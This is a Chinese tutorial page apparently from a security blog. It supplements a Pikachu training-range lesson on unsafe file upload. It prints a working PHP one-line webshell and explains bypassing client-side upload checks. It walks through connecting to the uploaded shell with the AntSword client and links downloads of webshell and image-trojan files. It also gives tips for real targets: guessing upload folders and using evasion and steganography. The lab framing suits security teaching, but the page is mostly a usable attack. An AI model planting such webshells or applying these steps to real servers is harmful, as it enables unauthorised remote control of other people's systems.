当前位置: 首页 > news >正文

Unsafe Fileupload篇补充-木马的详细教程与木马分享(中国蚁剑方式)

在之前的皮卡丘靶场第九期Unsafe Fileupload篇中我们学习了木马的原理并且学了一个简单的木马文件

本期内容是为了更好的为大家解释木马(服务器方面的)的原理,连接,以及各种木马及连接工具的分享

文件木马:https://wwhc.lanzoue.com/iDYwL2ybhw4b

图片木马:https://wwhc.lanzoue.com/idhXN2ybhw2j

中国蚁剑:加载器:https://wwhc.lanzoue.com/iHq4B2yfi8yh

源码:https://wwhc.lanzoue.com/iT5ZI2yfhwzg

如果可以用github:https://github.com/AntSwordProject/

为了更好的演示,本期还是以之前Unsafe Fileupload篇制造的木马为例

同时再拓展一下木马的种类,我们用到的是一句话木马,短小精干,此外还有大马,可以干的事情更多,但是上传难度更大

打开加载器把中国蚁剑初始化,选择目录为源码的下载目录后即可使用(或者不下载源码,选择一个空目录,让加载器自己下载源码)

我们还是以皮卡丘靶场第九期Unsafe Fileupload篇的内容为例进行

<?php  @eval($_POST['shell']); ?>

根据之前我们知道的,client check中我们可以通过F12禁用JavaScript来将木马上传进去

由此我们知道了上传的文件到了哪里,我们接下来用蚁剑来连接

我这里的url为

http://172.30.160.107/pikachu/vul/unsafeupload/uploads/1.php

ipv4的地址可以通过cmd输入ipconfig来获取

根据各位的情况来修改即可

我们右键选择添加数据后,填入url和密码(密码就是上面的shell)

编码器酌情选择,默认的话就是明码数据,被发现的话一抓一个准,这里用默认的演示

可以看到成功了

在此说明一下,在靶场中我们可以通过查看前端文件来了解木马文件上传位置,在实际操作中我们不可能提前知道,所以要细心观察,通常获取位置的方式有抓包或者通过常用文件夹来试探比如常见的文件夹有/uploads/、/files/、/images/

上传方面经常会用到免杀,隐写等方式来避免被识别

进去以后可以看到出货了

完成

至此,Unsafe Fileupload篇-木马补充完成

http://www.xdnf.cn/news/956071.html

相关文章:

  • PLC入门【4】基本指令2(SET RST)
  • 分布式系统简述
  • Appium下载安装配置保姆教程(图文详解)
  • 基于 Three.js 的数字雨波纹效果技术解析
  • 浏览器工作原理11 [#] this:从JavaScript执行上下文视角讲this
  • SpringBoot请求限流(RateLimiter)
  • 针对药品仓库的效期管理问题,如何利用WMS系统“破局”
  • align-items: start和align-items: flex-start的区别
  • 技术创新赋能产业升级:国际数字影像产业园引领变革浪潮
  • 【网络安全】开源系统getshell漏洞挖掘
  • UI 自动化测试工具推荐
  • [KCTF]CORE CrackMe v2.0
  • ​小学五年级的语言来解释符号​
  • ui框架-文件列表展示
  • 拉曼光谱效应:分子指纹的科学与应用
  • 视觉slam--三维刚体运动
  • java教程笔记(十四)-线程池
  • DAY 44 训练
  • RK3588开发笔记-wifi6 SDIO接口rtl8822cs调试笔记
  • Mysql故障排插与环境优化
  • ESP32-S3 IDF V5.4.1 LVGL 9.2.0 fatfs
  • RabbitMQ优先级队列的使用
  • 掌握业务三板斧:目标、过程、成果
  • 视频监控管理平台EasyCVR接入RTMP推流后FLV格式流高延时问题解决方案
  • 会计 - 股份支付
  • 六、接口关联
  • 对云边协同技术的理解
  • Python 协程全解析:async/await、asyncio.run、协程 vs 多线程、I/O 密集首选协程
  • EasyExcel读取csv文件乱码
  • 在 JavaScript中编写 Appium 测试(入门)